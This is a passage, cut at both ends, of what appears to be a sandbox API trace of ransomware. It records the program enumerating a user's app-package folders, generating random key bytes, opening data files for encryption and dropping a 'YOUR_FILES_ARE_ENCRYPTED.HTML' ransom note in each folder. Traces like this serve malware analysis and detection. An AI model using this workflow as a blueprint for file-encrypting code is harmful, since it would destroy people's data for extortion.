lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x451c66d8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x451c66d8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x451c66d8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0114.365] StrStrIW (lpFirst="Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.365] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe") returned 131 [0114.365] GetProcessHeap () returned 0x600000 [0114.365] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.366] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe" [0114.366] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\*" [0114.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x451c66d8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x451c66d8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x451c66d8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.368] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x451c66d8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x451c66d8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x451c66d8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.368] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x451c66d8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x457bc474, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x457bc474, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0114.368] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.368] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 147 [0114.368] GetProcessHeap () returned 0x600000 [0114.368] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.369] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore" [0114.369] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0114.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x451c66d8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x457bc474, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x457bc474, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187f20, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.370] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x451c66d8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x457bc474, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x457bc474, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 1 [0114.370] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x451c66d8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x45e24a35, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x45e24a35, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x311bec0, dwReserved1=0x3187f20, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0114.370] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.370] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 167 [0114.370] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0114.370] lstrlenW (lpString=".dat") returned 4 [0114.371] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0114.371] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\microsoft.3dbuilder_10.9.50.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0114.371] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0114.371] GetProcessHeap () returned 0x600000 [0114.371] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0114.373] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="73") returned 2 [0114.373] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="3E") returned 2 [0114.373] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="34") returned 2 [0114.373] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="C9") returned 2 [0114.373] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="8E") returned 2 [0114.373] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="FA") returned 2 [0114.373] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="0F") returned 2 [0114.373] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="95") returned 2 [0114.373] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="07") returned 2 [0114.373] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="F1") returned 2 [0114.373] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="A0") returned 2 [0114.373] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="B0") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="5A") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="63") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="E4") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="68") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="0F") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="3C") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="42") returned 2 [0114.374] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="A4") returned 2 [0114.374] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="5E") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="0B") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="2D") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="47") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="15") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="C5") returned 2 [0114.374] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="C0") returned 2 [0114.374] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="72") returned 2 [0114.374] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="FE") returned 2 [0114.374] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="6B") returned 2 [0114.374] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="FF") returned 2 [0114.374] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="4B") returned 2 [0114.374] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0114.375] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.375] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0114.375] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x45238f5f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x45238f5f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x45238f5f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x311bec0, dwReserved1=0x3187f20, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0114.375] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.375] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 172 [0114.375] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0114.375] lstrlenW (lpString=".LOG1") returned 5 [0114.375] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0114.375] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x45238f5f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x45238f5f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x45238f5f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187f20, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0114.375] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.375] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 172 [0114.375] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0114.375] lstrlenW (lpString=".LOG2") returned 5 [0114.375] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0114.375] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x45238f5f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x45238f5f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x45238f5f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187f20, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0114.375] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.375] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 177 [0114.375] GetProcessHeap () returned 0x600000 [0114.375] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\microsoft.3dbuilder_10.9.50.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.376] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.377] CloseHandle (hObject=0x324) returned 1 [0114.377] GetProcessHeap () returned 0x600000 [0114.377] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.377] GetProcessHeap () returned 0x600000 [0114.377] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.377] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x451c66d8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x457bc474, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x457bc474, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0114.377] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.377] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 161 [0114.377] GetProcessHeap () returned 0x600000 [0114.377] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\microsoft.3dbuilder_10.9.50.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.378] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.379] CloseHandle (hObject=0x31c) returned 1 [0114.379] GetProcessHeap () returned 0x600000 [0114.379] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.379] GetProcessHeap () returned 0x600000 [0114.379] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.380] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0114.380] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.380] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState") returned 95 [0114.380] GetProcessHeap () returned 0x600000 [0114.380] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.381] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState" [0114.381] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState\\*" [0114.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.381] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.381] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 0 [0114.382] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.382] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0114.382] GetProcessHeap () returned 0x600000 [0114.382] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.382] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.383] CloseHandle (hObject=0x31c) returned 1 [0114.383] GetProcessHeap () returned 0x600000 [0114.383] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.383] GetProcessHeap () returned 0x600000 [0114.383] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.384] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 